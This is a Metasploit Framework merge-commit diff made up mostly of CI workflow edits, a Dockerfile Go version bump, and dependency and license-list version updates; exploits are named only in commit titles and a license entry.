automatic module_metadata_base.json update

Land #18348 , Splunk account take over (CVE-2023-32707) leading to RCE
Land #18479 , No longer clear remote service msfdb creds by default
2023-10-26 10:49:41 -05:00 · 2023-10-26 11:34:02 -04:00 · 2023-10-26 15:09:00 +01:00 · 2023-10-26 14:03:06 +02:00 · 2023-10-26 00:21:22 +01:00 · 2023-10-25 21:22:26 +01:00
585 changed files with 65971 additions and 2136 deletions
@@ -36,6 +36,7 @@ on:
      - 'modules/payloads/**'
      - 'lib/msf/core/payload/**'
      - 'lib/msf/core/**'
+      - 'tools/dev/**'
      - 'spec/acceptance/**'
      - 'spec/acceptance_spec_helper.rb'
 #   Example of running as a cron, to weed out flaky tests
@@ -170,6 +171,28 @@ jobs:
    if: always()

    steps:
+      - name: Checkout code
+        uses: actions/checkout@v3
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_WITHOUT: "coverage development"
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: 3.0.2
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
      - uses: actions/download-artifact@v3
        id: download
        if: always()
@@ -185,8 +208,12 @@ jobs:
          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
          tar -zxvf allure-$VERSION.tgz -C .

+          ls -la ${{steps.download.outputs.download-path}}
          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report

+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
      - name: archive results
        if: always()
        uses: actions/upload-artifact@v3
@@ -67,7 +67,7 @@ jobs:
          - '3.0'
          - '3.1'
          - '3.2'
-          - '3.3.0-preview1'
+          - '3.3.0-preview2'
        os:
          - ubuntu-20.04
          - ubuntu-latest
@@ -43,9 +43,9 @@ RUN apk add --no-cache \
 ENV GO111MODULE=off
 RUN mkdir -p $TOOLS_HOME/bin && \
    cd $TOOLS_HOME/bin && \
-    curl -O https://dl.google.com/go/go1.19.3.src.tar.gz && \
-    tar -zxf go1.19.3.src.tar.gz && \
-    rm go1.19.3.src.tar.gz && \
+    curl -O https://dl.google.com/go/go1.21.1.src.tar.gz && \
+    tar -zxf go1.21.1.src.tar.gz && \
+    rm go1.21.1.src.tar.gz && \
    cd go/src && \
    ./make.bash

@@ -1,10 +1,10 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.3.31)
-      actionpack (~> 7.0)
-      activerecord (~> 7.0)
-      activesupport (~> 7.0)
+    metasploit-framework (6.3.40)
+      actionpack (~> 7.0.0)
+      activerecord (~> 7.0.0)
+      activesupport (~> 7.0.0)
      aws-sdk-ec2
      aws-sdk-ec2instanceconnect
      aws-sdk-iam
@@ -26,14 +26,14 @@ PATH
      filesize
      hrr_rb_ssh-ed25519
      http-cookie
-      irb
+      irb (~> 1.7.4)
      jsobfu
      json
      metasm
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.148)
+      metasploit-payloads (= 2.0.156)
      metasploit_data_models
      metasploit_payloads-mettle (= 1.0.26)
      mqtt
@@ -103,36 +103,36 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.1.0)
-    actionpack (7.0.5)
-      actionview (= 7.0.5)
-      activesupport (= 7.0.5)
+    actionpack (7.0.8)
+      actionview (= 7.0.8)
+      activesupport (= 7.0.8)
      rack (~> 2.0, >= 2.2.4)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (7.0.5)
-      activesupport (= 7.0.5)
+    actionview (7.0.8)
+      activesupport (= 7.0.8)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (7.0.5)
-      activesupport (= 7.0.5)
-    activerecord (7.0.5)
-      activemodel (= 7.0.5)
-      activesupport (= 7.0.5)
-    activesupport (7.0.5)
+    activemodel (7.0.8)
+      activesupport (= 7.0.8)
+    activerecord (7.0.8)
+      activemodel (= 7.0.8)
+      activesupport (= 7.0.8)
+    activesupport (7.0.8)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
      tzinfo (~> 2.0)
-    addressable (2.8.4)
+    addressable (2.8.5)
      public_suffix (>= 2.0.2, < 6.0)
    afm (0.2.2)
-    allure-rspec (2.22.0)
-      allure-ruby-commons (= 2.22.0)
+    allure-rspec (2.23.0)
+      allure-ruby-commons (= 2.23.0)
      rspec-core (>= 3.8, < 4)
-    allure-ruby-commons (2.22.0)
+    allure-ruby-commons (2.23.0)
      mime-types (>= 3.3, < 4)
      require_all (>= 2, < 4)
      rspec-expectations (~> 3.12)
@@ -141,34 +141,35 @@ GEM
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.776.0)
-    aws-sdk-core (3.174.0)
+    aws-partitions (1.834.0)
+    aws-sdk-core (3.185.1)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.651.0)
      aws-sigv4 (~> 1.5)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.382.0)
-      aws-sdk-core (~> 3, >= 3.174.0)
+    aws-sdk-ec2 (1.411.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-ec2instanceconnect (1.27.0)
-      aws-sdk-core (~> 3, >= 3.165.0)
+    aws-sdk-ec2instanceconnect (1.34.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.79.0)
-      aws-sdk-core (~> 3, >= 3.174.0)
+    aws-sdk-iam (1.87.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.66.0)
-      aws-sdk-core (~> 3, >= 3.174.0)
+    aws-sdk-kms (1.72.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.123.1)
-      aws-sdk-core (~> 3, >= 3.174.0)
+    aws-sdk-s3 (1.136.0)
+      aws-sdk-core (~> 3, >= 3.181.0)
      aws-sdk-kms (~> 1)
-      aws-sigv4 (~> 1.4)
-    aws-sdk-ssm (1.151.0)
-      aws-sdk-core (~> 3, >= 3.174.0)
+      aws-sigv4 (~> 1.6)
+    aws-sdk-ssm (1.158.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
      aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.5.2)
+    aws-sigv4 (1.6.0)
      aws-eventstream (~> 1, >= 1.0.2)
-    bcrypt (3.1.18)
+    base64 (0.1.1)
+    bcrypt (3.1.19)
    bcrypt_pbkdf (1.1.0)
    bindata (2.4.15)
    bootsnap (1.16.0)
@@ -208,18 +209,19 @@ GEM
    factory_bot_rails (6.2.0)
      factory_bot (~> 6.2.0)
      railties (>= 5.0.0)
-    faker (3.2.0)
+    faker (3.2.1)
      i18n (>= 1.8.11, < 2)
-    faraday (2.7.6)
+    faraday (2.7.11)
+      base64
      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
    faraday-net_http (3.0.2)
    faraday-retry (2.2.0)
      faraday (~> 2.0)
-    faye-websocket (0.11.2)
+    faye-websocket (0.11.3)
      eventmachine (>= 0.12.0)
      websocket-driver (>= 0.5.1)
-    ffi (1.15.5)
+    ffi (1.16.3)
    filesize (0.2.0)
    fivemat (1.3.7)
    gssapi (1.3.1)
@@ -239,12 +241,13 @@ GEM
    i18n (1.14.1)
      concurrent-ruby (~> 1.0)
    io-console (0.6.0)
-    irb (1.7.0)
-      reline (>= 0.3.0)
+    irb (1.7.4)
+      reline (>= 0.3.6)
    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
    json (2.6.3)
+    language_server-protocol (3.17.0.3)
    little-plugger (1.1.4)
    logging (2.3.1)
      little-plugger (~> 1.1)
@@ -256,12 +259,12 @@ GEM
      systemu (~> 2.6.5)
    memory_profiler (1.0.1)
    metasm (1.0.5)
-    metasploit-concern (5.0.1)
+    metasploit-concern (5.0.2)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.5)
+    metasploit-credential (6.0.6)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -271,12 +274,12 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (5.0.1)
+    metasploit-model (5.0.2)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
-    metasploit-payloads (2.0.148)
-    metasploit_data_models (6.0.2)
+    metasploit-payloads (2.0.156)
+    metasploit_data_models (6.0.3)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
      arel-helpers
@@ -288,27 +291,27 @@ GEM
      webrick
    metasploit_payloads-mettle (1.0.26)
    method_source (1.0.0)
-    mime-types (3.4.1)
+    mime-types (3.5.1)
      mime-types-data (~> 3.2015)
-    mime-types-data (3.2023.0218.1)
-    mini_portile2 (2.8.2)
-    minitest (5.18.0)
+    mime-types-data (3.2023.1003)
+    mini_portile2 (2.8.4)
+    minitest (5.20.0)
    mqtt (0.6.0)
    msgpack (1.6.1)
    multi_json (1.15.0)
    mustermann (3.0.0)
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
-    net-imap (0.3.7)
+    net-imap (0.4.0)
      date
      net-protocol
    net-ldap (0.18.0)
    net-protocol (0.2.1)
      timeout
-    net-smtp (0.3.3)
+    net-smtp (0.4.0)
      net-protocol
-    net-ssh (7.1.0)
-    network_interface (0.0.2)
+    net-ssh (7.2.0)
+    network_interface (0.0.4)
    nexpose (7.3.0)
    nio4r (2.5.9)
    nokogiri (1.14.5)
@@ -324,7 +327,7 @@ GEM
    packetfu (2.0.0)
      pcaprub (~> 0.13.1)
    parallel (1.23.0)
-    parser (3.2.2.3)
+    parser (3.2.2.4)
      ast (~> 2.4.1)
      racc
    patch_finder (1.0.2)
@@ -335,31 +338,32 @@ GEM
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.5.3)
+    pg (1.5.4)
    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.10.1)
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
-    public_suffix (5.0.1)
-    puma (6.3.0)
+    public_suffix (5.0.3)
+    puma (6.4.0)
      nio4r (~> 2.0)
-    racc (1.7.0)
-    rack (2.2.7)
-    rack-protection (3.0.6)
-      rack
+    racc (1.7.1)
+    rack (2.2.8)
+    rack-protection (3.1.0)
+      rack (~> 2.2, >= 2.2.4)
    rack-test (2.1.0)
      rack (>= 1.3)
-    rails-dom-testing (2.0.3)
-      activesupport (>= 4.2.0)
+    rails-dom-testing (2.2.0)
+      activesupport (>= 5.0.0)
+      minitest
      nokogiri (>= 1.6)
    rails-html-sanitizer (1.6.0)
      loofah (~> 2.21)
      nokogiri (~> 1.14)
-    railties (7.0.5)
-      actionpack (= 7.0.5)
-      activesupport (= 7.0.5)
+    railties (7.0.8)
+      actionpack (= 7.0.8)
+      activesupport (= 7.0.8)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
@@ -369,62 +373,62 @@ GEM
    rasn1 (0.12.1)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    recog (3.1.1)
+    recog (3.1.2)
      nokogiri
    redcarpet (3.6.0)
-    regexp_parser (2.8.0)
-    reline (0.3.5)
+    regexp_parser (2.8.1)
+    reline (0.3.8)
      io-console (~> 0.5)
    require_all (3.0.0)
-    rex-arch (0.1.14)
+    rex-arch (0.1.15)
      rex-text
-    rex-bin_tools (0.1.8)
+    rex-bin_tools (0.1.9)
      metasm
      rex-arch
      rex-core
      rex-struct2
      rex-text
    rex-core (0.1.31)
-    rex-encoder (0.1.6)
+    rex-encoder (0.1.7)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.38)
+    rex-exploitation (0.1.39)
      jsobfu
      metasm
      rex-arch
      rex-encoder
      rex-text
      rexml
-    rex-java (0.1.6)
-    rex-mime (0.1.7)
+    rex-java (0.1.7)
+    rex-mime (0.1.8)
      rex-text
-    rex-nop (0.1.2)
+    rex-nop (0.1.3)
      rex-arch
-    rex-ole (0.1.7)
+    rex-ole (0.1.8)
      rex-text
-    rex-powershell (0.1.97)
+    rex-powershell (0.1.99)
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.10)
+    rex-random_identifier (0.1.11)
      rex-text
-    rex-registry (0.1.4)
-    rex-rop_builder (0.1.4)
+    rex-registry (0.1.5)
+    rex-rop_builder (0.1.5)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.52)
+    rex-socket (0.1.54)
      rex-core
-    rex-sslscan (0.1.9)
+    rex-sslscan (0.1.10)
      rex-core
      rex-socket
      rex-text
-    rex-struct2 (0.1.3)
-    rex-text (0.2.52)
-    rex-zip (0.1.4)
+    rex-struct2 (0.1.4)
+    rex-text (0.2.53)
+    rex-zip (0.1.5)
      rex-text
-    rexml (3.2.5)
+    rexml (3.2.6)
    rkelly-remix (0.0.7)
    rspec (3.12.0)
      rspec-core (~> 3.12.0)
@@ -435,7 +439,7 @@ GEM
    rspec-expectations (3.12.3)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.12.0)
-    rspec-mocks (3.12.5)
+    rspec-mocks (3.12.6)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.12.0)
    rspec-rails (6.0.3)
@@ -448,21 +452,23 @@ GEM
      rspec-support (~> 3.12)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.12.0)
-    rubocop (1.52.0)
+    rspec-support (3.12.1)
+    rubocop (1.56.4)
+      base64 (~> 0.1.1)
      json (~> 2.3)
+      language_server-protocol (>= 3.17.0)
      parallel (~> 1.10)
-      parser (>= 3.2.0.0)
+      parser (>= 3.2.2.3)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.28.0, < 2.0)
+      rubocop-ast (>= 1.28.1, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 2.4.0, < 3.0)
    rubocop-ast (1.29.0)
      parser (>= 3.2.1.0)
-    ruby-macho (3.0.0)
-    ruby-mysql (4.0.0)
+    ruby-macho (4.0.0)
+    ruby-mysql (4.1.0)
    ruby-prof (1.4.2)
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
@@ -484,25 +490,25 @@ GEM
    simplecov-html (0.12.3)
    simpleidn (0.2.1)
      unf (~> 0.1.4)
-    sinatra (3.0.6)
+    sinatra (3.1.0)
      mustermann (~> 3.0)
      rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.0.6)
+      rack-protection (= 3.1.0)
      tilt (~> 2.0)
-    sqlite3 (1.6.3)
+    sqlite3 (1.6.6)
      mini_portile2 (~> 2.8.0)
-    sshkey (2.0.0)
+    sshkey (3.0.0)
    strptime (0.2.5)
    swagger-blocks (3.0.0)
    systemu (2.6.5)
-    test-prof (1.2.2)
+    test-prof (1.2.3)
    thin (1.8.2)
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
    thor (1.2.2)
-    tilt (2.2.0)
-    timecop (0.9.6)
+    tilt (2.3.0)
+    timecop (0.9.8)
    timeout (0.4.0)
    ttfunk (1.7.0)
    tzinfo (2.0.6)
@@ -512,14 +518,14 @@ GEM
    unf (0.1.4)
      unf_ext
    unf_ext (0.0.8.2)
-    unicode-display_width (2.4.2)
+    unicode-display_width (2.5.0)
    unix-crypt (1.3.1)
    uuid (2.3.9)
      macaddr (~> 1.0)
    warden (1.2.9)
      rack (>= 2.0.9)
    webrick (1.8.1)
-    websocket-driver (0.7.5)
+    websocket-driver (0.7.6)
      websocket-extensions (>= 0.1.0)
    websocket-extensions (0.1.5)
    win32api (0.1.0)
@@ -536,10 +542,10 @@ GEM
    xdr (3.0.3)
      activemodel (>= 4.2, < 8.0)
      activesupport (>= 4.2, < 8.0)
-    xmlrpc (0.3.2)
+    xmlrpc (0.3.3)
      webrick
    yard (0.9.34)
-    zeitwerk (2.6.8)
+    zeitwerk (2.6.12)

 PLATFORMS
  ruby
@@ -49,6 +49,11 @@ Files: data/webcam/api.js
 Copyright: Copyright 2013 Muaz Khan<@muazkh>.
 License: MIT

+Files: data/wordlists/flask_secret_keys.txt
+Source: https://github.com/Paradoxis/Flask-Unsign-Wordlist/blob/v2023.34/flask_unsign_wordlist/wordlists/github.txt
+Copyright: Copyright (c) 2023 Luke Paris (Paradoxis)
+License: MIT
+
 Files: external/source/byakugan/*
 Copyright: Lurene Grenier, 2009
 License: BSD-3-clause
@@ -80,6 +85,13 @@ Files: exteneral/source/exploits/CVE-2022-26904/*
 Copyright: 2022 Abdelhamid Naceri
 License: MIT

+Files: external/source/exploits/CVE-2023-36874/*
+Copyright: 2023 Octoberfest7
+License: MIT
+Purpose: Library and error report file are required for calculating offsets to the correct
+         function calls to implement the exploit.  The heavily modified C main is necessary
+         to create and trigger the exploit.
+
 Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
 Copyright: 2011 Jon Bringhurst
 License: GNU GPL 2.0
@@ -1,27 +1,28 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.1.0, MIT
-actionpack, 7.0.5, MIT
-actionview, 7.0.5, MIT
-activemodel, 7.0.5, MIT
-activerecord, 7.0.5, MIT
-activesupport, 7.0.5, MIT
-addressable, 2.8.4, "Apache 2.0"
+actionpack, 7.0.8, MIT
+actionview, 7.0.8, MIT
+activemodel, 7.0.8, MIT
+activerecord, 7.0.8, MIT
+activesupport, 7.0.8, MIT
+addressable, 2.8.5, "Apache 2.0"
 afm, 0.2.2, MIT
-allure-rspec, 2.22.0, "Apache 2.0"
-allure-ruby-commons, 2.22.0, "Apache 2.0"
+allure-rspec, 2.23.0, "Apache 2.0"
+allure-ruby-commons, 2.23.0, "Apache 2.0"
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.776.0, "Apache 2.0"
-aws-sdk-core, 3.174.0, "Apache 2.0"
-aws-sdk-ec2, 1.382.0, "Apache 2.0"
-aws-sdk-ec2instanceconnect, 1.27.0, "Apache 2.0"
-aws-sdk-iam, 1.79.0, "Apache 2.0"
-aws-sdk-kms, 1.66.0, "Apache 2.0"
-aws-sdk-s3, 1.123.1, "Apache 2.0"
-aws-sdk-ssm, 1.151.0, "Apache 2.0"
-aws-sigv4, 1.5.2, "Apache 2.0"
-bcrypt, 3.1.18, MIT
+aws-partitions, 1.834.0, "Apache 2.0"
+aws-sdk-core, 3.185.1, "Apache 2.0"
+aws-sdk-ec2, 1.411.0, "Apache 2.0"
+aws-sdk-ec2instanceconnect, 1.34.0, "Apache 2.0"
+aws-sdk-iam, 1.87.0, "Apache 2.0"
+aws-sdk-kms, 1.72.0, "Apache 2.0"
+aws-sdk-s3, 1.136.0, "Apache 2.0"
+aws-sdk-ssm, 1.158.0, "Apache 2.0"
+aws-sigv4, 1.6.0, "Apache 2.0"
+base64, 0.1.1, "ruby, Simplified BSD"
+bcrypt, 3.1.19, MIT
 bcrypt_pbkdf, 1.1.0, MIT
 bindata, 2.4.15, "Simplified BSD"
 bootsnap, 1.16.0, MIT
@@ -35,6 +36,7 @@ concurrent-ruby, 1.2.2, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
+date, 3.3.3, "ruby, Simplified BSD"
 debug, 1.8.0, "ruby, Simplified BSD"
 diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.70.0, "Apache 2.0"
@@ -47,12 +49,12 @@ erubi, 1.12.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.2.1, MIT
 factory_bot_rails, 6.2.0, MIT
-faker, 3.2.0, MIT
-faraday, 2.7.6, MIT
+faker, 3.2.1, MIT
+faraday, 2.7.11, MIT
 faraday-net_http, 3.0.2, MIT
 faraday-retry, 2.2.0, MIT
-faye-websocket, 0.11.2, "Apache 2.0"
-ffi, 1.15.5, "New BSD"
+faye-websocket, 0.11.3, "Apache 2.0"
+ffi, 1.16.3, "New BSD"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 gssapi, 1.3.1, MIT
@@ -65,38 +67,40 @@ http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
 i18n, 1.14.1, MIT
 io-console, 0.6.0, "ruby, Simplified BSD"
-irb, 1.7.0, "ruby, Simplified BSD"
+irb, 1.7.4, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.6.3, ruby
+language_server-protocol, 3.17.0.3, MIT
 little-plugger, 1.1.4, MIT
 logging, 2.3.1, MIT
 loofah, 2.21.3, MIT
 macaddr, 1.7.2, ruby
 memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 5.0.1, "New BSD"
-metasploit-credential, 6.0.5, "New BSD"
-metasploit-framework, 6.3.31, "New BSD"
-metasploit-model, 5.0.1, "New BSD"
-metasploit-payloads, 2.0.148, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 6.0.2, "New BSD"
+metasploit-concern, 5.0.2, "New BSD"
+metasploit-credential, 6.0.6, "New BSD"
+metasploit-framework, 6.3.40, "New BSD"
+metasploit-model, 5.0.2, "New BSD"
+metasploit-payloads, 2.0.156, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 6.0.3, "New BSD"
 metasploit_payloads-mettle, 1.0.26, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
-mime-types, 3.4.1, MIT
-mime-types-data, 3.2023.0218.1, MIT
-mini_portile2, 2.8.2, MIT
-minitest, 5.18.0, MIT
+mime-types, 3.5.1, MIT
+mime-types-data, 3.2023.1003, MIT
+mini_portile2, 2.8.4, MIT
+minitest, 5.20.0, MIT
 mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.0, MIT
 nessus_rest, 0.1.6, MIT
+net-imap, 0.4.0, "ruby, Simplified BSD"
 net-ldap, 0.18.0, MIT
 net-protocol, 0.2.1, "ruby, Simplified BSD"
-net-smtp, 0.3.3, "ruby, Simplified BSD"
-net-ssh, 7.1.0, MIT
-network_interface, 0.0.2, MIT
+net-smtp, 0.4.0, "ruby, Simplified BSD"
+net-ssh, 7.2.0, MIT
+network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.5.9, MIT
 nokogiri, 1.14.5, MIT
@@ -107,62 +111,62 @@ openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 2.0.0, "New BSD"
 parallel, 1.23.0, MIT
-parser, 3.2.2.3, MIT
+parser, 3.2.2.4, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.1, LGPL-2.1
 pdf-reader, 2.11.0, MIT
-pg, 1.5.3, "Simplified BSD"
+pg, 1.5.4, "Simplified BSD"
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
-public_suffix, 5.0.1, MIT
-puma, 6.3.0, "New BSD"
-racc, 1.7.0, "ruby, Simplified BSD"
-rack, 2.2.7, MIT
-rack-protection, 3.0.6, MIT
+public_suffix, 5.0.3, MIT
+puma, 6.4.0, "New BSD"
+racc, 1.7.1, "ruby, Simplified BSD"
+rack, 2.2.8, MIT
+rack-protection, 3.1.0, MIT
 rack-test, 2.1.0, MIT
-rails-dom-testing, 2.0.3, MIT
+rails-dom-testing, 2.2.0, MIT
 rails-html-sanitizer, 1.6.0, MIT
-railties, 7.0.5, MIT
+railties, 7.0.8, MIT
 rainbow, 3.1.1, MIT
 rake, 13.0.6, MIT
 rasn1, 0.12.1, MIT
 rb-readline, 0.5.5, BSD
-recog, 3.1.1, unknown
+recog, 3.1.2, unknown
 redcarpet, 3.6.0, MIT
-regexp_parser, 2.8.0, MIT
-reline, 0.3.5, ruby
+regexp_parser, 2.8.1, MIT
+reline, 0.3.8, ruby
 require_all, 3.0.0, MIT
-rex-arch, 0.1.14, "New BSD"
-rex-bin_tools, 0.1.8, "New BSD"
+rex-arch, 0.1.15, "New BSD"
+rex-bin_tools, 0.1.9, "New BSD"
 rex-core, 0.1.31, "New BSD"
-rex-encoder, 0.1.6, "New BSD"
-rex-exploitation, 0.1.38, "New BSD"
-rex-java, 0.1.6, "New BSD"
-rex-mime, 0.1.7, "New BSD"
-rex-nop, 0.1.2, "New BSD"
-rex-ole, 0.1.7, "New BSD"
-rex-powershell, 0.1.97, "New BSD"
-rex-random_identifier, 0.1.10, "New BSD"
-rex-registry, 0.1.4, "New BSD"
-rex-rop_builder, 0.1.4, "New BSD"
-rex-socket, 0.1.52, "New BSD"
-rex-sslscan, 0.1.9, "New BSD"
-rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.52, "New BSD"
-rex-zip, 0.1.4, "New BSD"
-rexml, 3.2.5, "Simplified BSD"
+rex-encoder, 0.1.7, "New BSD"
+rex-exploitation, 0.1.39, "New BSD"
+rex-java, 0.1.7, "New BSD"
+rex-mime, 0.1.8, "New BSD"
+rex-nop, 0.1.3, "New BSD"
+rex-ole, 0.1.8, "New BSD"
+rex-powershell, 0.1.99, "New BSD"
+rex-random_identifier, 0.1.11, "New BSD"
+rex-registry, 0.1.5, "New BSD"
+rex-rop_builder, 0.1.5, "New BSD"
+rex-socket, 0.1.54, "New BSD"
+rex-sslscan, 0.1.10, "New BSD"
+rex-struct2, 0.1.4, "New BSD"
+rex-text, 0.2.53, "New BSD"
+rex-zip, 0.1.5, "New BSD"
+rexml, 3.2.6, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.12.0, MIT
 rspec-core, 3.12.2, MIT
 rspec-expectations, 3.12.3, MIT
-rspec-mocks, 3.12.5, MIT
+rspec-mocks, 3.12.6, MIT
 rspec-rails, 6.0.3, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.12.0, MIT
-rubocop, 1.52.0, MIT
+rspec-support, 3.12.1, MIT
+rubocop, 1.56.4, MIT
 rubocop-ast, 1.29.0, MIT
-ruby-macho, 3.0.0, MIT
-ruby-mysql, 4.0.0, MIT
+ruby-macho, 4.0.0, MIT
+ruby-mysql, 4.1.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
@@ -174,34 +178,34 @@ sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
-sinatra, 3.0.6, MIT
-sqlite3, 1.6.3, "New BSD"
-sshkey, 2.0.0, MIT
+sinatra, 3.1.0, MIT
+sqlite3, 1.6.6, "New BSD"
+sshkey, 3.0.0, MIT
 strptime, 0.2.5, "Simplified BSD"
 swagger-blocks, 3.0.0, MIT
 systemu, 2.6.5, ruby
-test-prof, 1.2.2, MIT
+test-prof, 1.2.3, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
 thor, 1.2.2, MIT
-tilt, 2.2.0, MIT
-timecop, 0.9.6, MIT
-timeout, 0.3.2, "ruby, Simplified BSD"
+tilt, 2.3.0, MIT
+timecop, 0.9.8, MIT
+timeout, 0.4.0, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 2.0.6, MIT
 tzinfo-data, 1.2023.3, MIT
 unf, 0.1.4, "2-clause BSDL"
 unf_ext, 0.0.8.2, MIT
-unicode-display_width, 2.4.2, MIT
+unicode-display_width, 2.5.0, MIT
 unix-crypt, 1.3.1, 0BSD
 uuid, 2.3.9, MIT
 warden, 1.2.9, MIT
 webrick, 1.8.1, "ruby, Simplified BSD"
-websocket-driver, 0.7.5, "Apache 2.0"
+websocket-driver, 0.7.6, "Apache 2.0"
 websocket-extensions, 0.1.5, "Apache 2.0"
 win32api, 0.1.0, unknown
 windows_error, 0.1.5, BSD
 winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
-xmlrpc, 0.3.2, "ruby, Simplified BSD"
+xmlrpc, 0.3.3, "ruby, Simplified BSD"
 yard, 0.9.34, MIT
-zeitwerk, 2.6.8, MIT
+zeitwerk, 2.6.12, MIT
@@ -0,0 +1,15 @@
+---
+info:
+  title: Metasploit Framework
+  description: Metasploit Framework
+  x-cortex-git:
+    github:
+      alias: r7org
+      repository: rapid7/metasploit-framework
+  x-cortex-tag: metasploit-framework
+  x-cortex-type: service
+  x-cortex-domain-parents:
+  - tag: metasploit
+openapi: 3.0.1
+servers:
+- url: "/"
@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
